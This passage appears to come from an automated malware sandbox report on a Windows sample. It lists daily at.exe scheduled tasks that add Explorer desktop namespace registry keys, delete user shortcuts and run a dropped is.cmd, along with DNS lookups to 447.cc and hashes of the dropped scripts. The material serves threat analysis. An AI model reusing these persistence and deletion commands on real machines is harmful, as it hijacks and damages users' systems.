at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs
| MD5 | 7e46083fb1779c4baf8efe26e6bfbed4 |
| SHA1 | 07155bb6e06e4ddb125a7afd50b5ee67c5c2e1a2 |
| SHA256 | d2b0505bb8eafd88c99de4643d40c9aa5a5a0428a0a30d291fa29657974fadb9 |
| SHA512 | c594c621e954a3b76d9d77a25f4dbd563bacf31450e5afd1ba577f147a4ea6e591c4ba361c0c3c89623a06d6facfb4dd9e1633efff8a41871f21734251a2ffc0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd
| MD5 | 93283cb2cbb91dc2553d3ccc53c24787 |
| SHA1 | 271054a80b7332910d4f746ccbabd6b9d85915fe |
| SHA256 | 31d5b5b80fc2c292ae1d3d94e6c35b5272e8ad0e9b06aa086eb61d6238d66beb |
| SHA512 | 6b485717301db3a10fde12b378de7e79a018e5e33eef9808c1a414a2b5ba983cc4b32a1bbfa5cd4005085c648381f663eb15c35f1e06c5b3e58bbc6fc6e5b70f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | e9453c56277dd24802b553677d0620fc |
| SHA1 | 8b27914191feae8061dd9577d473a638173b92a7 |
| SHA256 | 46493b2ba1dbf1f0b360d276423c0e7b7f99cdbe7f23a623d63ce8f20f82ea2d |
| SHA512 | c55a87c18ab67756556943c480385d6a42bb0904b090885b93c151f4661a132c9eb67a9838876af6217636a313a3a817629c2a0fe2a43313fddf1978191d8e41 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 5e1ac5999e539cafa3a303e8386cfbf9 |
| SHA1 | dcd5ce7b101636bb35b3c38ea4456f20b5fb142a |
| SHA256 | d9a95138ba749e2c04355d7b9354d90a45941d20fb120af3d2969779d90748d6 |
| SHA512 | f18fe45f0731f4deec3fde3ff19fe1b3d586db3e75e748224adfa0b0ea4b1fabab6b7dfbed3a127cadf2ea9ee6a5a0f9191b50055df39e64a5cce90da50a43a1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 22ba26c787caf9c226a57ab934efe3a7 |
| SHA1 | 41da9b24a7e138eadf7fe359a9832bab35a22098 |
| SHA256 | 506c7c101ef39fb59bcef1a4952f0303f979daf01ffe4048e12458ad3cc0181d |
| SHA512 | 75609142b2e50fee2136f27c0dd124b3714f052579ab667fbfaf6f167bd1057b967f34d05293bf4b316b8580a3f63a8903fa147c83821087a4102a66ffb4e941 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1d903a49275ecf0360a005a210710ae1 |
| SHA1 | 53d92ee4cf725fd774fde7d8715dc57f05b4ad5e |
| SHA256 | 5228e97bfb7487be8921377a47ee94aa14ab9fb5208d719fc92cf81350949c6e |
| SHA512 | 0411ec8b3cf03f3587fb9a47b7e587d879fcdfbc6a56e2637a6e5400f4a4fd49c52adc0012c66bde052ed5b5bf96b53340b361cd99c8c2b3a4087d7147362ff4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd
| MD5 | b47fb6ca5604063bb4e0af862ee3be9c |
| SHA1 | ebe74903212c246c83d826fa9ce7789141772b30 |
| SHA256 | fd34806658512394d2f4b9185d32590717b7f2169caad83bea0d93b3564b3044 |
| SHA512 | 0a01779afed506d2e22267205863d23f8570de394704019d23cb1d8239fa1735d04976bc3cdcab301db33297cd6a2203afbc4238c1158edb044ba4a65a2db814 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1424-53-0x0000000000400000-0x0000000000423000-memory.dmp
memory/1424-55-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verFCFD.tmp
| MD5 | 1a545d0052b581fbb2ab4c52133846bc |
| SHA1 | 62f3266a9b9925cd6d98658b92adec673cbe3dd3 |
| SHA256 | 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1 |
| SHA512 | bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YY018DS9\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |